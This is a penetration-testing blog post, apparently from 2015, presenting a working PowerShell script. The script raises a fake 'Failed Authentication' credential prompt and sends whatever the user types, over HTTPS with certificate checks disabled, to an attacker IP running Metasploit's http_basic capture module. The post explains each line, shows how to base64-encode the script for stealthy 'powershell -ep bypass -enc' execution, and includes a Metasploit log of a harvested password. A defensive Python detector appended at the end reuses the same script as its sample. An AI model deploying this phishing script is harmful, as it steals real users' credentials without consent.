https://docs.google.com/spreadsheets/d/1TytbnvqekJEF0jxLANe6sNa5fu05dFaHEP7zudlJej0/edit?usp=sharing


Monday, January 12, 2015

Powershell Popups + Capture

Metasploit Minute has entered its 3rd “season”, and we kick it off by using the Metasploit capture modules to capture creds from this PowerShell popup. The cool thing about this is that you can leave it executing on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free... over SSL. ;–)

Here is the video:



Here is the code:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

Let’s break down the code line by line:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This tells Windows to prompt for credentials with the title “Failed Authentication”, no text in the message field (so it uses the default), and the current username and domain pre-filled in the box to add authenticity. That’s where all the magic is; everything else is just gravy.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells PowerShell not to verify SSL certificates (this allows us to use a self-signed cert in the HTTPS transaction later).

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new WebClient object and sets its User-Agent header to look like Wget.

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells PowerShell to use whatever proxy the current user uses, with whatever credentials they have cached. If one or both are unnecessary, these settings are simply ignored.

$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

Tells PowerShell that the HTTP Basic credentials to use are the ones the user just typed into the popup box.

$result = $wc.downloadstring('https://172.16.102.163');

And finally, the request itself, here to the HTTP Basic capture module in Metasploit, though anything that accepts Basic auth could capture these creds.

To run the whole thing as a single encoded command, convert the script to UTF-16LE and base64 it, which is what PowerShell’s -enc expects:

cat power.txt | iconv --to-code UTF-16LE | base64


Then execute powershell -ep bypass -enc <the encoded text from above> and you get this:



root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic 
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) > 
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*]  Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /


Game over!
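From the defender’s side, the script broken down above has a recognizable shape: a credential prompt, certificate validation switched off, and the prompted password handed to a WebClient bound for an IP-literal URL. Below is an added example (my own code, not from the post, Metasploit Minute, or Metasploit) that reverses the post’s iconv-then-base64 step to recover the script from a -EncodedCommand argument, scans the decoded text for those indicators, and grades the result so that a prompt alone (normal admin tooling) is not treated the same as a prompt whose password leaves the host. The command lines it scans are constructed here for the demonstration; the same scan_script check applies unchanged to PowerShell Script Block Logging text (Event ID 4104), where the encoded wrapper has already been removed.

```python
import base64
import re
from typing import Dict, List, Optional

# Each indicator is one building block of the popup-and-capture script walked
# through above, expressed as a regex over decoded PowerShell text.
INDICATORS: Dict[str, "re.Pattern"] = {
    "credential_prompt": re.compile(r"\.promptforcredential\s*\(", re.I),
    "cert_validation_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "basic_creds_from_prompt": re.compile(
        r"\.credentials\s*=\s*new-object\s+system\.net\.networkcredential", re.I),
    "plaintext_password_read": re.compile(r"\.getnetworkcredential\(\)\.password", re.I),
    "ip_literal_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The lookbehind keeps us anchored to a real switch; -ExecutionPolicy does not match.
ENC_FLAG = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_like_the_post(script: str) -> str:
    """Mirror the post's `iconv --to-code UTF-16LE | base64` step; used only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: treat as unencoded


def scan_script(script: str) -> List[str]:
    """Names of the indicators present in a piece of PowerShell text."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Decode if needed, scan, and grade. A credential prompt on its own is
    ordinary admin tooling; the prompt combined with the password being handed
    to a web client is the combination worth an alert."""
    decoded = decode_encoded_command(cmdline)
    hits = scan_script(decoded if decoded is not None else cmdline)
    exfil = "basic_creds_from_prompt" in hits or "plaintext_password_read" in hits
    if "credential_prompt" in hits and exfil:
        severity = "high"
    elif "credential_prompt" in hits or "cert_validation_disabled" in hits:
        severity = "medium"
    else:
        severity = "low"
    return {"encoded": decoded is not None, "indicators": hits, "severity": severity}


# Constructed samples. SAMPLE_SCRIPT is the post's script trimmed to the lines
# that carry the indicators, encoded exactly as the post does; the others are
# the kind of harmless PowerShell invocations deployment tooling produces daily.
SAMPLE_SCRIPT = (
    "$cred = $host.ui.promptforcredential('Failed Authentication','',"
    "[Environment]::UserName,[Environment]::UserDomainName);"
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
    "$wc = new-object net.webclient;"
    "$wc.credentials = new-object system.net.networkcredential("
    "$cred.username, $cred.getnetworkcredential().password, '');"
    "$result = $wc.downloadstring('https://172.16.102.163');"
)
SAMPLE_MALICIOUS_CMDLINE = "powershell -ep bypass -enc " + encode_like_the_post(SAMPLE_SCRIPT)
SAMPLE_BENIGN_CMDLINE = (
    "powershell.exe -NoProfile -EncodedCommand " + encode_like_the_post("Get-Date | Out-String")
)
SAMPLE_PLAIN_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"

if __name__ == "__main__":
    for label, cmd in (("malicious", SAMPLE_MALICIOUS_CMDLINE),
                       ("benign-encoded", SAMPLE_BENIGN_CMDLINE),
                       ("plain", SAMPLE_PLAIN_CMDLINE)):
        print(label, analyze_command_line(cmd))
```

Feeding real process-creation events (Windows 4688 or Sysmon Event ID 1 command lines) through analyze_command_line and routing only "high" results to an on-call queue keeps the noise from legitimate Get-Credential prompts down while still surfacing the specific prompt-plus-WebClient pattern the post relies on.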